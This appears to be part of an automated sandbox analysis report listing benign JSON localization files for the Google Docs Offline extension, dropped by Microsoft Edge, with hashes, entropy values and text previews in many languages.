                                                                                                                                                                                                                                                                                    SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                    MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                    SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                    SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                    SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1305
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                    MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                    SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                    SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                    SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):911
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                    MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                    SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                    SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                    SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):939
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                    MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                    SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                    SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                    SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                    MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                    SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                    SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                    SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):972
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                    MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                    SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                    SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                    SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):990
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                    MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                    SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                    SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                    SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1658
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                    MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                    SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                    SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                    SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1672
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                    MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                    SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                    SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                    SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):935
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                    MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                    SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                    SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                    SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1065
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                    MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                    SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                    SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                    SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2771
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                    MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                    SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                    SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                    SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):858
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                    MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                    SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                    SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                    SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):954
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                    MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                    SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                    SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                    SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):899
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                    MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                    SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                    SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                    SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2230
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                    MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                    SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                    SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
